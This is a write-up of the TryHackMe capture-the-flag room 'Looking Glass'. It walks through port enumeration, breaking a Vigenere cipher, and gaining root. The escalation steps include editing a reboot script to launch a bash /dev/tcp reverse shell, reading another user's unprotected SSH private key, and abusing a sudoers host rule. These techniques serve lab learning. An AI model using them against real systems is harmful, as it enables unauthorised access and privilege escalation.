WriteUp — THM Looking Glass
Step through the looking glass. A sequel to the Wonderland challenge room.
This is a writeup for TryHackMe room Looking Glass. My writeup for the first part of the Lewis Carrol themed series can be found here.
Start with nmap scan to see open ports and services. It reveals a ton of open ports which are identified as SSH. Need to check the ports individually so dump them into a file.
nmap --open lookingglass.thm | grep /tcp | cut -d '/' -f1 > ports.txt
Try to get something with HTTP:
while read p; do
curl http://lookingglass.thm:$p
done < ports.txt
Every port replies with:
curl: (1) Received HTTP/0.9 when not allowed
So let’s try SSH:
ssh -o “StrictHostKeyChecking=no” lookingglass.thm -p 11111
Warning: Permanently added ‘[lookingglass.thm]:11111,[]:11111’ (RSA) to the list of known hosts.
That’s an unusual reply. Maybe I need to find the right port? Let’s try with the highest port:
ssh -o "StrictHostKeyChecking=no" lookingglass.thm -p 13783
Connection to lookingglass.thm closed.
What about the lowest port?
ssh -o “StrictHostKeyChecking=no” lookingglass.thm -p 9000
Connection to lookingglass.thm closed.
Maybe the instructions are reversed? Let’s find the right port by testing with binary search algorithm. I also found out that you need to also use ports not in the nmap scan and eventually arrive at the right port (it is different for each box):
ssh -o “StrictHostKeyChecking=no” lookingglass.thm -p 10569
Warning: Permanently added ‘[lookingglass.thm]:10569,[]:10569’ (RSA) to the list of known hosts.
You’ve found the real service.
Solve the challenge to get access to the box
‘Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.‘Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!’Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe —
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.‘Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!’
Wl ciskvttk me apw jzn.‘Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
Gaining access
This must be Jabberwocky poem from the Trough the Looking-Glass book. Comparing the second word in the poem “brillig” to ciphertext “mgplmmz” indicates that this is is not a simple monoalphabetic substitution cipher. Let’s try to see if it’s Vigenere cipher an online tool: https://www.dcode.fr/vigenere-cipher
We can use a known plaintext method and select a long word like “Bandersnatch”. This quickly reveals that the text is Vigenere encrypted and the key is “THEALPHABETCIPHER”. Using the same tool the text can be decrypted and it reveals the secret to be “__REDACTED__”. Let’s enter that to the shell question. The program replies with a text before closing the connection:
This password is dynamically created so not a spoiler showing it here. I test logging in with SSH and these credentials and gain access as jabberwock. User flag is reversed so I get the right flag using:
rev user.txt
I start looking for privilege escalation vectors using linPEAS. Intersting findings:
At reboot a script is executed:
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh
Jabberwock can reboot the system:
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
I can edit the script so to get interactive access I change it to run a reverse shell and reboot the system using sudo.
bash -i >& /dev/tcp/ 0>&1
After the reboot is completed I get a shell as tweedledum. There is an interesting file in his home directory:
cat humptydumpty.txt
I enter this text to CyberChef and select to convert it from hex. The text is mostly garbled but the last bytes are interesting:
the password is zyxwvutsrqponmlk
I test if I can login as humptydumpty and this password. Doesn’t work with ssh but sudoing in does:
su - humptydumpty
Enumerating as humptydumpty there is another poem in his home directory where Humpty Dumpty is explaing Jabberwocky poem to Alice. Which is good, I was already starting to question my English skills.
Enumerating the system I notice interesting permissions on alice’s home directory:
ls -la
total 32
drwxr-xr-x 8 root root 4096 Jul 3 01:25 .
drwxr-xr-x 24 root root 4096 Jul 2 23:24 ..
drwx--x--x 6 alice alice 4096 Jul 3 02:53 alice
drwx------ 4 humptydumpty humptydumpty 4096 Oct 25 09:56 humptydumpty
drwxrwxrwx 5 jabberwock jabberwock 4096 Oct 25 09:43 jabberwock
drwx------ 5 tryhackme tryhackme 4096 Jul 3 03:00 tryhackme
drwx------ 3 tweedledee tweedledee 4096 Jul 3 02:42 tweedledee
drwx------ 2 tweedledum tweedledum 4096 Jul 3 02:42 tweedledum
I cannot enumerate the directories but what if I try some files like flag.txt, poem.txt etc? I also check for RSA key:
cat /home/alice/.ssh/id_rsa
To my surprise I get the key and it’s not even passphrase protected. I copy the key to a file and login as alice:
ssh -i id_rsa_alice alice@lookingglass.thm
I enumerate system again with linPEAS but don’t find out any escalation vectors. But there must be something about alice so I enumerate files with different parameters: user=alice, group=alice and even grep -Ril “alice” /. Finally I stumble to something useful with:
find / -iname “*alice*” 2>/dev/null
looking at this file it is world readable so we can take a look:
cat /etc/sudoers.d/alice
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
So there we go!
sudo -h ssalg-gnikool /bin/bash
Now just grab the root flag and we are done! Another very well done room, thank you NinjaJc01! Just need to get Humpty Dumpty rhyme out of my head now…